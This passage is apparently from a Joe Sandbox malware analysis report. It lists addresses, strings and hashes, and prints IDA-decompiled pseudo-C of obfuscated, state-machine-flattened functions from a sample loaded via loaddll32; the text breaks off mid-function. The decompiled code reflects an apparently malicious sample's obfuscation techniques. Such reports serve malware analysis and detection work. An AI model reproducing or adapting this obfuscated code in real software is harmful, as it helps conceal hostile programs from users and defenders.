0x00d369f0
0x00d369f8
0x00d36a06
0x00d36a0a
0x00d36a0e
0x00d36a16
0x00d36a16
0x00d36a24
0x00d36afb
0x00d36aff
0x00d36b04
0x00d36b07
0x00d36b09
0x00d36b0b
0x00000000
0x00d36b0b
0x00d36a2a
0x00d36a30
0x00d36aa5
0x00d36ac1
0x00d36ac6
0x00d36acc
0x00d36ad3
0x00d36adb
0x00d36ae1
0x00d36ae6
0x00000000
0x00d36a32
0x00d36a38
0x00d36a7b
0x00d36a81
0x00d36a88
0x00d36a8d
0x00d36a8f
0x00d36a92
0x00d36a95
0x00d36a9b
0x00000000
0x00d36a9b
0x00d36a3a
0x00d36a40
0x00d36b45
0x00d36b4e
0x00d36b59
0x00d36b60
0x00d36b62
0x00d36b64
0x00d36b6a
0x00d36b6c
0x00d36b6c
0x00d36b66
0x00d36b66
0x00d36b68
0x00000000
0x00000000
0x00d36b68
0x00d36b64
0x00d36a46
0x00d36a4c
0x00000000
0x00d36a52
0x00d36a52
0x00000000
0x00d36a52
0x00d36a4c
0x00d36a40
0x00d36a38
0x00d36a30
0x00d36b6d
0x00d36b79
0x00d36b79
0x00d36b25
0x00d36b2a
0x00d36b2f
0x00d36b32
0x00d36b37
0x00d36b37
0x00d36b37
0x00000000

Strings

w , xrefs: 00D36823
/i, xrefs: 00D369E0
Cq, xrefs: 00D368B3
?, xrefs: 00D369F8
:, xrefs: 00D3673D
ai, xrefs: 00D36996
=, xrefs: 00D36801

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: /i$?$ai$w $:$Cq$=
API String ID: 0-170593755
Opcode ID: 6a76146150763d185147f5716e969069fdfaef2cf1abbd44bbf6199f519e4632
Instruction ID: 957bc30016e50e9494e1093b2b4d33a2883cf0548eaf90d372c4053d941d9beb
Opcode Fuzzy Hash: 6a76146150763d185147f5716e969069fdfaef2cf1abbd44bbf6199f519e4632
Instruction Fuzzy Hash: D6B10D728083809FC368CF65C58A90BFBE1BBC4758F148A1DF5A9A6220D3B5D949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00D44A66, Relevance: 7.8, Strings: 6, Instructions: 269
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00D44A66() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				void* _t271;
				void* _t272;
				intOrPtr _t277;
				intOrPtr _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t289;
				intOrPtr _t294;
				intOrPtr _t311;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				intOrPtr _t325;
				signed int* _t327;
				void* _t330;

				_t327 =  &_v640;
				_v532 = 0x9eda53;
				_v528 = 0x2697e4;
				_t289 = 0xd8634eb;
				_t325 = 0;
				_v524 = 0;
				_v580 = 0x257a8f;
				_v580 = _v580 + 0xffff0a69;
				_t317 = 0x46;
				_v580 = _v580 / _t317;
				_v580 = _v580 ^ 0x00008592;
				_v556 = 0x213626;
				_t16 =  &_v556; // 0x213626
				_t318 = 0x3f;
				_v556 =  *_t16 * 0x37;
				_v556 = _v556 ^ 0x0722a203;
				_v564 = 0xc854a8;
				_v564 = _v564 >> 0xd;
				_v564 = _v564 ^ 0x000f067d;
				_v568 = 0x3071d1;
				_v568 = _v568 + 0xffff48c8;
				_v568 = _v568 ^ 0x002621f6;
				_v548 = 0x47fca2;
				_v548 = _v548 ^ 0x7cca96d7;
				_v548 = _v548 ^ 0x7c82555f;
				_v624 = 0xc0bc8e;
				_v624 = _v624 | 0x773eab6a;
				_v624 = _v624 + 0x32c;
				_v624 = _v624 + 0xe315;
				_v624 = _v624 ^ 0x77fb7a9a;
				_v544 = 0x592636;
				_v544 = _v544 << 0xb;
				_v544 = _v544 ^ 0xc9333252;
				_v572 = 0x38b1a;
				_v572 = _v572 ^ 0xe2d962db;
				_v572 = _v572 ^ 0xe2dfc1be;
				_v592 = 0x205e14;
				_v592 = _v592 + 0xffffa7ef;
				_v592 = _v592 + 0xffff7efd;
				_v592 = _v592 ^ 0x001a340d;
				_v540 = 0xa56fb;
				_v540 = _v540 ^ 0x6fafefe0;
				_v540 = _v540 ^ 0x6fae5e5f;
				_v616 = 0x18df03;
				_v616 = _v616 >> 6;
				_v616 = _v616 + 0x4bd4;
				_v616 = _v616 * 0xb;
				_v616 = _v616 ^ 0x000ee45e;
				_v632 = 0xf97e7d;
				_v632 = _v632 >> 0xe;
				_v632 = _v632 << 1;
				_v632 = _v632 >> 8;
				_v632 = _v632 ^ 0x0007c205;
				_v588 = 0x1ac705;
				_v588 = _v588 >> 0xe;
				_v588 = _v588 | 0x5b484d5d;
				_v588 = _v588 ^ 0x5b49b1bf;
				_v608 = 0xcfa712;
				_v608 = _v608 << 0xb;
				_v608 = _v608 + 0xffff02b3;
				_v608 = _v608 / _t318;
				_v608 = _v608 ^ 0x01ff3be8;
				_v600 = 0x40b8c7;
				_v600 = _v600 >> 0xe;
				_v600 = _v600 + 0xffff3f18;
				_v600 = _v600 ^ 0xffff31b4;
				_v560 = 0xb86873;
				_v560 = _v560 * 0x79;
				_v560 = _v560 ^ 0x572fdc31;
				_v596 = 0x3e642a;
				_t319 = 0x51;
				_v596 = _v596 / _t319;
				_t320 = 0x15;
				_v596 = _v596 / _t320;
				_v596 = _v596 ^ 0x00087e57;
				_v636 = 0x2d2a20;
				_t132 =  &_v636; // 0x2d2a20
				_t321 = 0x64;
				_v636 =  *_t132 * 0x60;
				_v636 = _v636 + 0xd33d;
				_v636 = _v636 << 5;
				_v636 = _v636 ^ 0x1e1aa121;
				_v640 = 0xb10dcc;
				_v640 = _v640 | 0xc382035c;
				_v640 = _v640 << 7;
				_v640 = _v640 | 0x409aa621;
				_v640 = _v640 ^ 0xd99a11e4;
				_v584 = 0xf23298;
				_v584 = _v584 / _t321;
				_v584 = _v584 << 0xa;
				_v584 = _v584 ^ 0x09bffa87;
				_v620 = 0xffd84f;
				_v620 = _v620 + 0x561c;
				_v620 = _v620 + 0x86f;
				_v620 = _v620 ^ 0xc18b30ac;
				_v620 = _v620 ^ 0xc08b73c8;
				_v628 = 0x373ddb;
				_v628 = _v628 | 0x384c5e9f;
				_v628 = _v628 >> 0xc;
				_v628 = _v628 + 0xc32f;
				_v628 = _v628 ^ 0x000038bb;
				_v604 = 0xfde248;
				_v604 = _v604 + 0xffff394c;
				_t322 = 0x71;
				_v604 = _v604 * 0xa;
				_v604 = _v604 ^ 0x90dc5ac9;
				_v604 = _v604 ^ 0x99310c60;
				_v576 = 0xeb2acc;
				_v576 = _v576 / _t322;
				_v576 = _v576 >> 0xf;
				_v576 = _v576 ^ 0x000b47a1;
				_v612 = 0xe0e237;
				_t199 =  &_v612; // 0xe0e237
				_t323 = 0x22;
				_v612 =  *_t199 * 0x63;
				_v612 = _v612 << 0xf;
				_v612 = _v612 + 0xffff9396;
				_v612 = _v612 ^ 0xbdacf125;
				_v552 = 0xa3e3d4;
				_t324 = _v536;
				_v552 = _v552 / _t323;
				_v552 = _v552 ^ 0x00068221;
				goto L1;
				do {
					while(1) {
						L1:
						_t330 = _t289 - 0xa9836df;
						if(_t330 > 0) {
							break;
						}
						if(_t330 == 0) {
							E00D33046(_v616, _v632, _v588, _t324, _v608);
							_t327 =  &(_t327[3]);
							L12:
							_t289 = 0xc26911c;
							continue;
						}
						if(_t289 == 0x7276a71) {
							_v536 = _v580;
							goto L12;
						}
						if(_t289 == 0x85778ce) {
							E00D407F4();
							_t289 = 0x9029ee2;
							continue;
						}
						if(_t289 == 0x9029ee2) {
							E00D50DB1(_v584,  &_v520, __eflags, _v620, _t289, _v628);
							_t283 = E00D3EFE1(_v576, _v612, _v552,  &_v520);
							_t294 =  *0xd56214; // 0x0
							 *((intOrPtr*)(_t294 + 4)) = _t283;
							L23:
							return _t325;
						}
						if(_t289 != 0x9959e7d) {
							goto L20;
						}
						_t285 = E00D4E8B6(_t289, _v572, _v592, _t289, _v564, _v540);
						_t324 = _t285;
						_t327 =  &(_t327[4]);
						if(_t285 == 0) {
							_t289 = 0x7276a71;
						} else {
							_t287 =  *0xd56214; // 0x0
							 *((intOrPtr*)(_t287 + 0x20)) = 1;
							_t289 = 0xdb6aac8;
						}
					}
					__eflags = _t289 - 0xc26911c;
					if(_t289 == 0xc26911c) {
						_t311 =  *0xd56214; // 0x0
						_t271 = E00D31A34(_v600, _t311 + 0x34, _t289, _t289, _v560, _v596, _v636, _t289, _v536, _v640);
						_t327 =  &(_t327[8]);
						_t289 = 0x85778ce;
						__eflags = _t271;
						_t272 = 1;
						_t325 =  ==  ? _t272 : _t325;
						goto L20;
					}
					__eflags = _t289 - 0xd8634eb;
					if(_t289 == 0xd8634eb) {
						_push(_t289);
						_push(_t289);
						_t277 = E00D3C5D8(0x444);
						_t327 =  &(_t327[3]);
						 *0xd56214 = _t277;
						_t289 = 0x9959e7d;
						goto L1;
					}
					__eflags = _t289 - 0xdb6aac8;
					if(__eflags != 0) {
						goto L20;
					}
					_t289 = 0xa9836df;
					_v536 = _v556;
					goto L1;
					L20:
					__eflags = _t289 - 0xdb6d293;
				} while (__eflags != 0);
				goto L23;
			}

0x00d44a66
0x00d44a6c
0x00d44a76
0x00d44a7e
0x00d44a86
0x00d44a88
0x00d44a8f
0x00d44a97
0x00d44aa6
0x00d44aab
0x00d44ab1
0x00d44ab9
0x00d44ac1
0x00d44ac6
0x00d44ac7
0x00d44acb
0x00d44ad3
0x00d44adb
0x00d44ae0
0x00d44ae8
0x00d44af0
0x00d44af8
0x00d44b00
0x00d44b08
0x00d44b10
0x00d44b18
0x00d44b20
0x00d44b28
0x00d44b30
0x00d44b38
0x00d44b40
0x00d44b48
0x00d44b4d
0x00d44b55
0x00d44b5d
0x00d44b65
0x00d44b6d
0x00d44b75
0x00d44b7d
0x00d44b85
0x00d44b8d
0x00d44b95
0x00d44b9d
0x00d44ba5
0x00d44bad
0x00d44bb2
0x00d44bbf
0x00d44bc3
0x00d44bcb
0x00d44bd3
0x00d44bd8
0x00d44bdc
0x00d44be1
0x00d44be9
0x00d44bf1
0x00d44bf6
0x00d44bfe
0x00d44c06
0x00d44c0e
0x00d44c13
0x00d44c21
0x00d44c25
0x00d44c2d
0x00d44c35
0x00d44c3a
0x00d44c42
0x00d44c4a
0x00d44c57
0x00d44c5b
0x00d44c65
0x00d44c7d
0x00d44c82
0x00d44c8c
0x00d44c91
0x00d44c97
0x00d44c9f
0x00d44ca7
0x00d44cac
0x00d44caf
0x00d44cb3
0x00d44cbb
0x00d44cc0
0x00d44cc8
0x00d44cd0
0x00d44cd8
0x00d44cdd
0x00d44ce5
0x00d44ced
0x00d44cfd
0x00d44d01
0x00d44d06
0x00d44d0e
0x00d44d16
0x00d44d1e
0x00d44d26
0x00d44d2e
0x00d44d36
0x00d44d3e
0x00d44d46
0x00d44d4b
0x00d44d53
0x00d44d5b
0x00d44d63
0x00d44d70
0x00d44d73
0x00d44d77
0x00d44d7f
0x00d44d87
0x00d44d97
0x00d44d9b
0x00d44da0
0x00d44da8
0x00d44db0
0x00d44db5
0x00d44db6
0x00d44dba
0x00d44dbf
0x00d44dc7
0x00d44dcf
0x00d44ddd
0x00d44de1
0x00d44de5
0x00d44de5
0x00d44ded
0x00d44ded
0x00d44ded
0x00d44ded
0x00d44def
0x00000000
0x00000000
0x00d44df5
0x00d44e83
0x00d44e88
0x00d44e6b
0x00d44e6b
0x00000000
0x00d44e6b
0x00d44dfd
0x00d44e67
0x00000000
0x00d44e67
0x00d44e05
0x00d44e57
0x00d44e5c
0x00000000
0x00d44e5c
0x00d44e0d
0x00d44f39
0x00d44f56
0x00d44f5b
0x00d44f64
0x00d44f68
0x00d44f73
0x00d44f73
0x00d44e19
0x00000000
0x00000000
0x00d44e30
0x00d44e35
0x00d44e37
0x00d44e3c
0x00d44e50
0x00d44e3e
0x00d44e3e
0x00d44e46
0x00d44e49
0x00d44e49
0x00d44e3c
0x00d44e8d
0x00d44e8f
0x00d44ef3
0x00d44f02
0x00d44f07
0x00d44f0a
0x00d44f0f
0x00d44f13
0x00d44f14
0x00000000
0x00d44f14
0x00d44e91
0x00d44e97
0x00d44ec0
0x00d44ec1
0x00d44ec7
0x00d44ecc
0x00d44ecf
0x00d44ed4
0x00000000
0x00d44ed4
0x00d44e99
0x00d44e9f
0x00000000
0x00000000
0x00d44ea5
0x00d44ea7
0x00000000
0x00d44f17
0x00d44f17
0x00d44f17
0x00000000

Strings

*-, xrefs: 00D44CA7
6&Y, xrefs: 00D44B40
*d>, xrefs: 00D44C65
&6!, xrefs: 00D44AC1
]MH[, xrefs: 00D44BF6
7, xrefs: 00D44DB0

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: *-$&6!$*d>$6&Y$7$]MH[
API String ID: 0-1885758756
Opcode ID: 0e74f54e95960168785f34b20a948df8cb20c2955208fb7041fcc8b9f38d67cd
Instruction ID: 04dd4e473ad5106bcf57ef3183af18f2ef802e373392b42c9e9388edb2b2c41c
Opcode Fuzzy Hash: 0e74f54e95960168785f34b20a948df8cb20c2955208fb7041fcc8b9f38d67cd
Instruction Fuzzy Hash: CAD141B15083809FD368CF65C48991BFBE1FBD4758F248A1DF6968A260C3B5C989CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00D4CCD9, Relevance: 7.7, Strings: 6, Instructions: 227
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E00D4CCD9(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t242;
				intOrPtr _t243;
				intOrPtr _t244;
				void* _t248;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				void* _t282;
				void* _t283;
				signed int _t285;
				signed int* _t287;
				signed int* _t288;

				_t287 =  &_v100;
				_v4 = _v4 & 0x00000000;
				_v8 = 0x71e8b0;
				_v36 = 0x18cf5b;
				_v36 = _v36 + 0x6698;
				_v36 = _v36 ^ 0x001a117a;
				_v60 = 0xa2890;
				_t282 = __edx;
				_t248 = __ecx;
				_t283 = 0x72ed85;
				_t250 = 0x42;
				_v60 = _v60 / _t250;
				_v60 = _v60 ^ 0xe73bacde;
				_v60 = _v60 ^ 0xe73fbe74;
				_v40 = 0x9c8291;
				_t251 = 0x70;
				_v40 = _v40 / _t251;
				_v40 = _v40 ^ 0x000cc374;
				_v64 = 0xa8df6e;
				_t252 = 0x66;
				_v64 = _v64 * 0x5a;
				_v64 = _v64 | 0x6df616d5;
				_v64 = _v64 ^ 0x7ff9e958;
				_v88 = 0xc174cb;
				_v88 = _v88 ^ 0xe7b64a13;
				_v88 = _v88 ^ 0xc84137a7;
				_v88 = _v88 << 0xc;
				_v88 = _v88 ^ 0x60915aca;
				_v32 = 0x752193;
				_v32 = _v32 * 0x3f;
				_v32 = _v32 ^ 0x1cda7702;
				_v92 = 0x141833;
				_v92 = _v92 + 0xffffc8f8;
				_v92 = _v92 + 0xf362;
				_v92 = _v92 << 0x10;
				_v92 = _v92 ^ 0xd48431d2;
				_v96 = 0xc34044;
				_v96 = _v96 << 8;
				_v96 = _v96 + 0xffff536d;
				_v96 = _v96 + 0x5d23;
				_v96 = _v96 ^ 0xc334c852;
				_v20 = 0x3a6348;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x6343ca6d;
				_v56 = 0x49cd71;
				_v56 = _v56 ^ 0x72d9145f;
				_v56 = _v56 + 0x4f98;
				_v56 = _v56 ^ 0x7290366b;
				_v24 = 0x3bf83a;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x77f6a760;
				_v28 = 0x632842;
				_v28 = _v28 + 0xffffe69b;
				_v28 = _v28 ^ 0x006ee443;
				_v48 = 0x4b2ed5;
				_v48 = _v48 ^ 0x82c7a85b;
				_v48 = _v48 + 0xffff7c4b;
				_v48 = _v48 ^ 0x8282f052;
				_v52 = 0x4c7b52;
				_v52 = _v52 + 0xffffbc1f;
				_v52 = _v52 + 0x2e12;
				_v52 = _v52 ^ 0x004752b1;
				_v16 = 0x3a13fc;
				_v16 = _v16 / _t252;
				_v16 = _v16 ^ 0x00081e0d;
				_v84 = 0x8573c6;
				_t253 = 0x4b;
				_v84 = _v84 / _t253;
				_v84 = _v84 | 0x42242f90;
				_v84 = _v84 >> 0xc;
				_v84 = _v84 ^ 0x00008b33;
				_v100 = 0x3509ce;
				_t254 = 0x19;
				_v100 = _v100 / _t254;
				_t285 = 0x44;
				_t255 = 0x6f;
				_v100 = _v100 * 0x31;
				_v100 = _v100 + 0x6b64;
				_v100 = _v100 ^ 0x006714bf;
				_v68 = 0x65eeb7;
				_v68 = _v68 + 0x24bd;
				_v68 = _v68 << 7;
				_v68 = _v68 ^ 0x330bb4b3;
				_v72 = 0x31388d;
				_v72 = _v72 * 0x77;
				_v72 = _v72 / _t285;
				_v72 = _v72 ^ 0x00560572;
				_v76 = 0x10ecc2;
				_v76 = _v76 | 0x28471304;
				_v76 = _v76 + 0xcdda;
				_v76 = _v76 ^ 0x285661a5;
				_v44 = 0xf32c83;
				_v44 = _v44 / _t255;
				_v44 = _v44 / _t285;
				_v44 = _v44 ^ 0x000ff213;
				_v80 = 0xb9f4a0;
				_v80 = _v80 << 0xa;
				_v80 = _v80 + 0xd38f;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x00ede5ae;
				_v12 = 0x138f30;
				_v12 = _v12 ^ 0xf49e1969;
				_v12 = _v12 ^ 0xf48aec3a;
				while(1) {
					L1:
					_t242 = 0xd8fe181;
					do {
						L2:
						while(_t283 != 0x72ed85) {
							if(_t283 == 0xb6c7232) {
								_t278 = _v52;
								_t255 = _v48;
								_t243 = E00D51005(_v48, _v52, _v16, _v84,  *((intOrPtr*)(_t282 + 0x38)));
								_t287 =  &(_t287[3]);
								 *((intOrPtr*)(_t282 + 0x2c)) = _t243;
								__eflags = _t243;
								_t242 = 0xd8fe181;
								_t283 =  !=  ? 0xd8fe181 : 0xd6f812a;
								continue;
							}
							if(_t283 == 0xc5020c9) {
								_push(_v64);
								_t244 = E00D53263(_v36, _v60, __eflags, _t248, _v40, _t255);
								_t288 =  &(_t287[4]);
								 *((intOrPtr*)(_t282 + 0x38)) = _t244;
								__eflags = _t244;
								if(_t244 != 0) {
									E00D5148A(_t244, _t244, _v88, _v32, _v92, _v96);
									_t278 = _v56;
									_t255 = _v20;
									E00D3E2BD(_v56, _v24,  *((intOrPtr*)(_t282 + 0x38)), _v28);
									_t287 =  &(_t288[7]);
									_t283 = 0xb6c7232;
									goto L1;
								}
							} else {
								if(_t283 == 0xd6f812a) {
									return E00D3F0E9(_v44,  *((intOrPtr*)(_t282 + 0x38)), _v80, _v12);
								}
								if(_t283 != _t242) {
									goto L13;
								} else {
									_t244 = E00D40EBC(_v100, _t278, _v68, _v100, _v72, _v76, _v100, _t255, _t282, E00D525F1);
									_t287 =  &(_t287[8]);
									 *((intOrPtr*)(_t282 + 0x48)) = _t244;
									if(_t244 == 0) {
										_t283 = 0xd6f812a;
										while(1) {
											L1:
											_t242 = 0xd8fe181;
											goto L2;
										}
									}
								}
							}
							return _t244;
						}
						_t283 = 0xc5020c9;
						L13:
						__eflags = _t283 - 0x11d9bb5;
					} while (__eflags != 0);
					return _t242;
				}
			}

0x00d4ccd9
0x00d4ccdc
0x00d4cce1
0x00d4cce9
0x00d4ccf1
0x00d4ccf9
0x00d4cd01
0x00d4cd11
0x00d4cd13
0x00d4cd19
0x00d4cd1e
0x00d4cd23
0x00d4cd29
0x00d4cd31
0x00d4cd39
0x00d4cd45
0x00d4cd4a
0x00d4cd50
0x00d4cd58
0x00d4cd65
0x00d4cd66
0x00d4cd6a
0x00d4cd72
0x00d4cd7a
0x00d4cd82
0x00d4cd8a
0x00d4cd92
0x00d4cd97
0x00d4cd9f
0x00d4cdac
0x00d4cdb0
0x00d4cdb8
0x00d4cdc0
0x00d4cdc8
0x00d4cdd0
0x00d4cdd5
0x00d4cddd
0x00d4cde5
0x00d4cdea
0x00d4cdf2
0x00d4cdfa
0x00d4ce02
0x00d4ce0a
0x00d4ce0f
0x00d4ce17
0x00d4ce1f
0x00d4ce27
0x00d4ce2f
0x00d4ce37
0x00d4ce3f
0x00d4ce44
0x00d4ce4c
0x00d4ce54
0x00d4ce5c
0x00d4ce64
0x00d4ce6c
0x00d4ce74
0x00d4ce7c
0x00d4ce84
0x00d4ce8c
0x00d4ce94
0x00d4ce9c
0x00d4cea4
0x00d4ceb2
0x00d4ceb6
0x00d4cec0
0x00d4cece
0x00d4ced3
0x00d4ced7
0x00d4cedf
0x00d4cee4
0x00d4ceec
0x00d4cefa
0x00d4ceff
0x00d4cf0a
0x00d4cf0d
0x00d4cf0e
0x00d4cf12
0x00d4cf1a
0x00d4cf22
0x00d4cf2a
0x00d4cf32
0x00d4cf37
0x00d4cf3f
0x00d4cf4c
0x00d4cf58
0x00d4cf5c
0x00d4cf64
0x00d4cf6c
0x00d4cf74
0x00d4cf7c
0x00d4cf84
0x00d4cf94
0x00d4cfa3
0x00d4cfa7
0x00d4cfaf
0x00d4cfb7
0x00d4cfbc
0x00d4cfc4
0x00d4cfc9
0x00d4cfd1
0x00d4cfd9
0x00d4cfe1
0x00d4cfe9
0x00d4cfe9
0x00d4cfe9
0x00d4cfee
0x00000000
0x00d4cfee
0x00d4d000
0x00d4d0bc
0x00d4d0c0
0x00d4d0c4
0x00d4d0c9
0x00d4d0cc
0x00d4d0cf
0x00d4d0d3
0x00d4d0d8
0x00000000
0x00d4d0d8
0x00d4d00c
0x00d4d04e
0x00d4d060
0x00d4d065
0x00d4d068
0x00d4d06b
0x00d4d06d
0x00d4d087
0x00d4d097
0x00d4d09b
0x00d4d09f
0x00d4d0a4
0x00d4d0a7
0x00000000
0x00d4d0a7
0x00d4d00e
0x00d4d010
0x00000000
0x00d4d108
0x00d4d018
0x00000000
0x00d4d01e
0x00d4d037
0x00d4d03c
0x00d4d03f
0x00d4d044
0x00d4d04a
0x00d4cfe9
0x00d4cfe9
0x00d4cfe9
0x00000000
0x00d4cfe9
0x00d4cfe9
0x00d4d044
0x00d4d018
0x00d4d110
0x00d4d110
0x00d4d0e0
0x00d4d0e5
0x00d4d0e5
0x00d4d0e5
0x00000000
0x00d4cfee

Strings

$P, xrefs: 00D4CD0F, 00D4D023
R{L, xrefs: 00D4CE84
Hc:, xrefs: 00D4CE02
#], xrefs: 00D4CDF2
dk, xrefs: 00D4CF12
Cn, xrefs: 00D4CE5C

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: #]$$P$Cn$Hc:$R{L$dk
API String ID: 0-1551317889
Opcode ID: dacc6a797b705c45bd5e28bc4a04ddd62197fa9573fee88cc2ddbe10aae48f71
Instruction ID: e5c22da03c2dc6744e677e1804871a03ef8f981fc5b7b2d5fa63f842e3a0115a
Opcode Fuzzy Hash: dacc6a797b705c45bd5e28bc4a04ddd62197fa9573fee88cc2ddbe10aae48f71
Instruction Fuzzy Hash: C7B141B29083419FD358CF25C54941BFBE2FBC4748F108A2DF69996260D3B5CA49CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00D3F369, Relevance: 7.7, Strings: 6, Instructions: 211
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00D3F369(void* __ecx) {
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t207;
				void* _t210;
				void* _t213;
				void* _t214;
				void* _t216;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				void* _t241;
				signed int* _t243;
				void* _t246;

				_t243 =  &_v88;
				_v16 = 0x3949c2;
				asm("stosd");
				_t214 = __ecx;
				_t241 = 0;
				_t216 = 0x68b8c0f;
				asm("stosd");
				asm("stosd");
				_v76 = 0x201aab;
				_t234 = 0x76;
				_v76 = _v76 / _t234;
				_v76 = _v76 + 0xe408;
				_t235 = 0xc;
				_v76 = _v76 * 0x38;
				_v76 = _v76 ^ 0x004fdd99;
				_v44 = 0xd502f1;
				_v44 = _v44 | 0x910f8184;
				_v44 = _v44 / _t235;
				_v44 = _v44 ^ 0x0c2ba140;
				_v48 = 0xe41bd4;
				_v48 = _v48 ^ 0x89eac382;
				_t236 = 0x67;
				_v48 = _v48 / _t236;
				_v48 = _v48 ^ 0x015e526e;
				_v24 = 0xf49d06;
				_v24 = _v24 | 0x486b4754;
				_v24 = _v24 ^ 0x48f37dd9;
				_v88 = 0xd25a8e;
				_v88 = _v88 ^ 0x0de03e2c;
				_v88 = _v88 >> 8;
				_t237 = 0x57;
				_v88 = _v88 / _t237;
				_v88 = _v88 ^ 0x00057327;
				_v32 = 0x480afd;
				_v32 = _v32 ^ 0x00453f61;
				_v60 = 0x165baf;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0xd8cf9c31;
				_v60 = _v60 ^ 0x81a5172b;
				_v84 = 0x2fcd58;
				_v84 = _v84 + 0x335f;
				_v84 = _v84 + 0xffff6358;
				_v84 = _v84 << 9;
				_v84 = _v84 ^ 0x5ec42bb0;
				_v40 = 0xbc2783;
				_v40 = _v40 + 0xffff2ae1;
				_t238 = 0xa;
				_v40 = _v40 * 0x5e;
				_v40 = _v40 ^ 0x44c8bdaa;
				_v72 = 0xc9404f;
				_v72 = _v72 | 0xfaaf7fa5;
				_v72 = _v72 / _t238;
				_v72 = _v72 >> 0xc;
				_v72 = _v72 ^ 0x000be8dc;
				_v56 = 0xcb8585;
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0xa4d175a3;
				_v56 = _v56 ^ 0xa4d4e9a5;
				_v28 = 0xfbd7ad;
				_v28 = _v28 + 0xffffc7a7;
				_v28 = _v28 ^ 0x00f429b0;
				_v80 = 0x6cf7c4;
				_v80 = _v80 << 0xb;
				_v80 = _v80 ^ 0xc9851cf7;
				_v80 = _v80 + 0xe116;
				_v80 = _v80 ^ 0xae3f2149;
				_v52 = 0xd995b1;
				_v52 = _v52 + 0x112b;
				_v52 = _v52 + 0xffff70e0;
				_v52 = _v52 ^ 0x00d4086e;
				_v64 = 0x3e6f55;
				_v64 = _v64 ^ 0x64233eb3;
				_v64 = _v64 + 0xfffff8c9;
				_v64 = _v64 + 0xffffb5e5;
				_v64 = _v64 ^ 0x64179829;
				_v68 = 0x30eb6c;
				_t239 = 0x37;
				_v68 = _v68 / _t239;
				_v68 = _v68 + 0xffffeee1;
				_v68 = _v68 >> 0xa;
				_v68 = _v68 ^ 0x000816d3;
				_v20 = 0x71a516;
				_v20 = _v20 | 0x2f4429e5;
				_v20 = _v20 ^ 0x2f784372;
				_v36 = 0xda1832;
				_v36 = _v36 * 0x4c;
				_v36 = _v36 + 0xffff5a89;
				_v36 = _v36 ^ 0x40b976b8;
				goto L1;
				do {
					while(1) {
						L1:
						_t246 = _t216 - 0x68b8c0f;
						if(_t246 > 0) {
							break;
						}
						if(_t246 == 0) {
							_t216 = 0xe6264d6;
							continue;
						} else {
							if(_t216 == 0x8a1c17) {
								_push(_t216);
								_t202 = E00D407F0();
								_t243 =  &(_t243[1]);
								_t216 = 0xf218af8;
								_t241 = _t241 + _t202;
								continue;
							} else {
								if(_t216 == 0x50fe579) {
									_t241 = _t241 + E00D4BE8C(_t214 + 0x2c, _v64, _v68, _v20, _v36);
								} else {
									if(_t216 == 0x530d654) {
										_push(_t216);
										_t207 = E00D407F0();
										_t243 =  &(_t243[1]);
										_t216 = 0x8a5806a;
